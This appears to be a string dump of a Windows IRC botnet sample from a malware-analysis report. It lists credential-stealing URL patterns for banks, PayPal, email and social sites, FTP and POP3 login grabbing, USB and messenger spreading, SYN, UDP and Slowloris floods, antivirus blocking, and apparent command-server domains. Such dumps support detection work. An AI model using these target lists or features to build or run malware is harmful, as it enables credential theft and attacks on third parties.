[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
c:\%original file name%.exe
c:\%original file name%.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%WinDir%\Explorer.EXE
%WinDir%\Explorer.EXE
%WinDir%
%WinDir%
e621ca05.exe
e621ca05.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\explorer.exe
\Device\HarddiskVolume1\WINDOWS\explorer.exe
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Application Data\2.tmp
%Documents and Settings%\%current user%\Application Data\2.tmp
%Documents and Settings%\%current user%\Application Data\2.exe
%Documents and Settings%\%current user%\Application Data\2.exe
svchost.exe_936_rwx_00EA0000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
%System%\svchost.exe
%System%\svchost.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
\Device\HarddiskVolume1\WINDOWS\system32\svchost.exe
c:\%original file name%.exe
c:\%original file name%.exe
svchost.exe_1020_rwx_00B00000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
